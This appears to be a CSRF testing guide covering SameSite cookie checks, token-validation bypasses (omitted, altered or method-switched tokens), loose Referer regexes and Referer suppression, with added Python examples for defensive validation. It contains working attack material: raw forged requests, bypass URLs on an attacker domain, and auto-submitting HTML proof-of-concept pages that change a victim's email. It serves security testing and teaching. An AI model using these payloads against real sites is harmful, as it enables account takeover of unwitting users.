SameSite Cookie Attribute
The first thing to check in a CSRF test is the attributes set on the session cookie (the SameSite attribute above all, together with Secure and HttpOnly), because they decide whether the browser attaches the cookie to a cross-site request at all.
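The check described above, as an added example that is not part of the original page: a small parser for a Set-Cookie header and an audit function that reports the attributes relevant to CSRF exposure. The cookie name "session" and the header values are constructed placeholders, not taken from any real application.

```python
# Added example (not code from the original page): parse a Set-Cookie header and
# report the attributes that decide whether the session cookie rides along on a
# cross-site request. Header values used with it are constructed; the cookie
# name "session" is a placeholder, not a real application's cookie.

def parse_set_cookie(header_value):
    """Split 'name=value; Attr=val; Flag' into (name, value, {attr: val|True})."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        # Flags such as Secure and HttpOnly carry no value; record them as True.
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value.strip(), attrs


def audit_session_cookie(header_value):
    """Return a list of finding codes for a session cookie's Set-Cookie header."""
    _, _, attrs = parse_set_cookie(header_value)
    findings = []
    samesite = attrs.get("samesite")
    if samesite is None or samesite is True:
        # No SameSite attribute: the browser's default applies, and that default
        # differs between browsers, so the server cannot count on it.
        findings.append("NO_SAMESITE")
    elif str(samesite).lower() == "none":
        # Explicitly sent on every cross-site request; CSRF protection must
        # then come entirely from tokens or Origin/Referer checks.
        findings.append("SAMESITE_NONE")
        if attrs.get("secure") is not True:
            # Browsers reject SameSite=None cookies that are not also Secure.
            findings.append("SAMESITE_NONE_WITHOUT_SECURE")
    if attrs.get("secure") is not True:
        findings.append("NO_SECURE")
    if attrs.get("httponly") is not True:
        findings.append("NO_HTTPONLY")
    return findings


def hardened_session_cookie(name, value):
    """Set-Cookie value that is not attached to cross-site POSTs (Lax) and is
    neither readable by script nor sent over plain HTTP."""
    return f"{name}={value}; Path=/; Secure; HttpOnly; SameSite=Lax"
```

SameSite=Lax still lets the cookie accompany a top-level GET navigation, which is why the method-switch check later on this page matters; SameSite=Strict withholds it even there, at the cost of breaking links into the application from other sites.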
No CSRF Token
The most common mistake developers make is not including a CSRF token at all, so nothing beyond the automatically attached cookie ties the request to the user.

Request as issued by the application:

POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;

email=test%40test.com

Request as a cross-site page would replay it (identical, since there is no token to strip):

POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;

email=test%40test.com
CSRF Token is Being Validated
Check whether the CSRF token is actually validated by changing a single character of the csrf parameter value and confirming that the request is rejected.

Original request:

POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;

email=test%40test.com&csrf=EFd9BZX3mI6LgxnzJgaa42YMHORbcVBA

Modified request (last character of the token changed):

POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;

email=test%40test.com&csrf=EFd9BZX3mI6LgxnzJgaa42YMHORbcVBB
CSRF Token is Checked When the Parameter is Absent
Check whether the token is still validated when the csrf parameter is omitted entirely; some implementations only validate a token that is present and silently skip the check otherwise.

Original request:

POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;

email=test%40test.com&csrf=EFd9BZX3mI6LgxnzJgaa42YMHORbcVBA

Modified request (csrf parameter removed):

POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;

email=test%40test.com
CSRF Token is Being Checked on Different Methods
Check whether the token is still validated when the HTTP method is changed; some frameworks apply the CSRF check only to POST, while the handler still performs the action for GET.

Original request:

POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;

email=test%40test.com&csrf=EFd9BZX3mI6LgxnzJgaa42YMHORbcVBA

Modified request (method changed to GET):

GET /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;

email=test%40test.com&csrf=EFd9BZX3mI6LgxnzJgaa42YMHORbcVBA
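The four token checks above are really one procedure, so here is a single added example (not code from the original page) of a server-side validation routine that closes all four gaps: it refuses methods other than the intended one, treats a missing token as a failure rather than a reason to skip, and compares the full token against the value bound to the session in constant time. The session dict, the form body string and the allowed-method tuple are simplified stand-ins for whatever a real framework provides.

```python
# Added example, not the page's own code: a server-side CSRF check that closes
# the four gaps the requests above probe. The session dict, the raw form body
# and the allowed-method tuple are simplified stand-ins for framework objects
# (assumptions, not a real application's API).
import hmac
import secrets
from urllib.parse import parse_qsl


def issue_token(session):
    """Bind a fresh random token to the server-side session and return it so
    the application can embed it in its forms."""
    token = secrets.token_urlsafe(32)
    session["csrf"] = token
    return token


def parse_form_body(body):
    """Decode an application/x-www-form-urlencoded body such as
    'email=test%40test.com&csrf=...' into a dict (first value wins)."""
    params = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        params.setdefault(key, value)
    return params


def validate_request(session, method, body, allowed_methods=("POST",)):
    """Return (accepted, reason) for a state-changing endpoint."""
    # Gap 4 (method switch): the action must not be reachable through a method
    # that bypasses the check. Rejecting the method outright is simpler and
    # safer than trying to validate tokens on GET.
    if method.upper() not in allowed_methods:
        return False, "method_not_allowed"
    expected = session.get("csrf")
    if not expected:
        # A session that never received a token cannot have a valid one.
        return False, "no_token_in_session"
    supplied = parse_form_body(body).get("csrf")
    # Gap 3 (parameter absent): a missing parameter is a rejection, never a skip.
    if supplied is None:
        return False, "token_missing"
    # Gaps 1 and 2 (no token / token not validated): the whole value is compared
    # in constant time against the token bound to this session, so a single
    # changed character is detected.
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return False, "token_mismatch"
    return True, "ok"
```

Keeping the comparison on the server-side copy of the token (rather than on a value echoed back in a cookie) is what makes the single-character test meaningful: an attacker who cannot read the session cannot know what to submit.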
Bad Regex
Some applications make use of the HTTP Referer header to attempt to defend against CSRF attacks, normally by verifying that the request originated from the application's own domain. The following are mistakes developers make when that check is implemented as a loose regular expression instead of an exact comparison of the parsed host.

1. Bad Regex: Subdomain (the pattern only checks that the Referer starts with the application's domain, so a hostname that merely begins with it passes)
https://target.com.shelled.io/change_email

2. Bad Regex: Query Parameter (the pattern only checks that the domain appears somewhere in the Referer, so it can be placed in the query string)
https://shelled.io/change_email?target.com
Referer Header Removed
Some applications make use of the HTTP Referer header to attempt to defend against CSRF attacks, normally by verifying that the request originated from the application's own domain. Such applications may validate the Referer header when it is present but skip the validation entirely when the header is omitted.
The following meta tag stops the browser from sending a Referer header for requests that originate from the page:
<meta name="referrer" content="never">
PoC
<html>
  <head>
    <meta name="referrer" content="never">
  </head>
  <body>
    <form action="https://vulnerable-website.com/email/change" method="POST">
      <input type="hidden" name="email" value="pwned@evil-user.net" />
      <input type="hidden" name="csrf" value="WfF1szMUHhiokx9AHOfjRkE" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
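The Bad Regex section and the Referer Header Removed section above describe two failure modes of the same check, so one added example (not code from the original page) covers both: it reconstructs the two loose patterns as illustrations of what accepts the page's two URLs, and beside them a check that parses the source URL, compares the host exactly against an allow-list, prefers the Origin header, and fails closed when neither Origin nor Referer is present. The ALLOWED_HOSTS set and the plain headers dict are assumptions for the example.

```python
# Added example, not the page's own code: Origin/Referer validation that fails
# closed. ALLOWED_HOSTS and the plain dict of headers (canonical header casing
# assumed) stand in for the application's configuration and request object.
import re
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"target.com"}  # assumption: the application's own host(s)

# Illustrative reconstructions of the two flawed patterns the page describes
# (not taken from any specific application).
BAD_PREFIX_RE = re.compile(r"^https://target\.com")   # "starts with" only
BAD_CONTAINS_RE = re.compile(r"target\.com")          # "contains" anywhere


def bad_regex_accepts(referer):
    """(prefix-pattern accepts, contains-pattern accepts) for a Referer value."""
    return bool(BAD_PREFIX_RE.match(referer)), bool(BAD_CONTAINS_RE.search(referer))


def source_host(url):
    """Exact, lower-cased host of an https URL, or None if it cannot be parsed."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return None
    if parts.scheme != "https" or not parts.hostname:
        return None
    return parts.hostname.lower()


def same_origin_request(headers):
    """Accept only when Origin (preferred) or, failing that, Referer names an
    allowed host. Absence of both is a rejection, not a pass: that is the case
    the <meta name="referrer" content="never"> page above produces."""
    origin = headers.get("Origin")
    referer = headers.get("Referer")
    source = origin if origin is not None else referer
    if source is None:
        return False
    host = source_host(source)
    return host is not None and host in ALLOWED_HOSTS
```

Comparing the parsed hostname against a set means a userinfo prefix, a look-alike subdomain or a domain string in the query part never reaches the comparison; the regex variants fail precisely because they operate on the raw string.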
General CSRF PoC
<html>
  <body>
    <form action="https://vulnerable-website.com/email/change" method="POST">
      <input type="hidden" name="email" value="pwned@evil-user.net" />
      <input type="hidden" name="csrf" value="WfF1szMUHhiokx9AHOfjRkE" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>